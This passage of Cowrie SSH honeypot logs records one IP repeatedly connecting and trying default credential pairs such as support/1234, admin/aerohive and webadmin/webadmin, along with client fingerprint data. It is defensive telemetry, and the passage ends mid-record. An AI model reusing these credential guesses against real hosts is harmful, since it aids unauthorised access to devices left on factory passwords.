{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:12:09.403699Z","src_ip":"212.227.235.229","session":"0725d0a21168"}
{"eventid":"cowrie.login.failed","username":"support","password":"1234","message":"login attempt [support/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T08:12:11.373843Z","src_ip":"212.227.235.229","session":"0725d0a21168"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36298,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bebf4b38827","protocol":"ssh","message":"New connection: 212.227.235.229:36298 (1.2.3.4:22) [session: 8bebf4b38827]","sensor":"my-vps","timestamp":"2025-08-28T08:12:11.680082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:12:11.910111Z","src_ip":"212.227.235.229","session":"8bebf4b38827"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:12:11.953859Z","src_ip":"212.227.235.229","session":"8bebf4b38827"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36310,"dst_ip":"1.2.3.4","dst_port":22,"session":"40906d5795ca","protocol":"ssh","message":"New connection: 212.227.235.229:36310 (1.2.3.4:22) [session: 40906d5795ca]","sensor":"my-vps","timestamp":"2025-08-28T08:12:12.042926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:12:12.050689Z","src_ip":"212.227.235.229","session":"40906d5795ca"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:12:12.476886Z","src_ip":"212.227.235.229","session":"40906d5795ca"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:12.688799Z","src_ip":"212.227.235.229","session":"0725d0a21168"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44760,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a41b0da0d7c","protocol":"ssh","message":"New connection: 212.227.235.229:44760 (1.2.3.4:22) [session: 3a41b0da0d7c]","sensor":"my-vps","timestamp":"2025-08-28T08:12:13.024368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:12:13.025010Z","src_ip":"212.227.235.229","session":"3a41b0da0d7c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"aerohive","message":"login attempt [admin/aerohive] failed","sensor":"my-vps","timestamp":"2025-08-28T08:12:13.820189Z","src_ip":"212.227.235.229","session":"40906d5795ca"}
{"eventid":"cowrie.login.failed","username":"webadmin","password":"webadmin","message":"login attempt [webadmin/webadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T08:12:13.851178Z","src_ip":"212.227.235.229","session":"8bebf4b38827"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:12:14.278638Z","src_ip":"212.227.235.229","session":"3a41b0da0d7c"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:15.199990Z","src_ip":"212.227.235.229","session":"40906d5795ca"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:15.940342Z","src_ip":"212.227.235.229","session":"8bebf4b38827"}
{"eventid":"cowrie.login.failed","username":"sysadmin","password":"sysadmin","message":"login attempt [sysadmin/sysadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T08:12:16.541944Z","src_ip":"212.227.235.229","session":"3a41b0da0d7c"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:17.820483Z","src_ip":"212.227.235.229","session":"3a41b0da0d7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35744,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cee50eb0550","protocol":"ssh","message":"New connection: 212.227.235.229:35744 (1.2.3.4:22) [session: 7cee50eb0550]","sensor":"my-vps","timestamp":"2025-08-28T08:12:18.760174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:12:18.762775Z","src_ip":"212.227.235.229","session":"7cee50eb0550"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:12:19.031955Z","src_ip":"212.227.235.229","session":"7cee50eb0550"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35754,"dst_ip":"1.2.3.4","dst_port":22,"session":"002a072baf7f","protocol":"ssh","message":"New connection: 212.227.235.229:35754 (1.2.3.4:22) [session: 002a072baf7f]","sensor":"my-vps","timestamp":"2025-08-28T08:12:20.491459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:12:20.498143Z","src_ip":"212.227.235.229","session":"002a072baf7f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:12:20.787401Z","src_ip":"212.227.235.229","session":"002a072baf7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53874,"dst_ip":"1.2.3.4","dst_port":22,"session":"6153191e9604","protocol":"ssh","message":"New connection: 212.227.235.229:53874 (1.2.3.4:22) [session: 6153191e9604]","sensor":"my-vps","timestamp":"2025-08-28T08:12:20.846969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:12:20.848171Z","src_ip":"212.227.235.229","session":"6153191e9604"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-h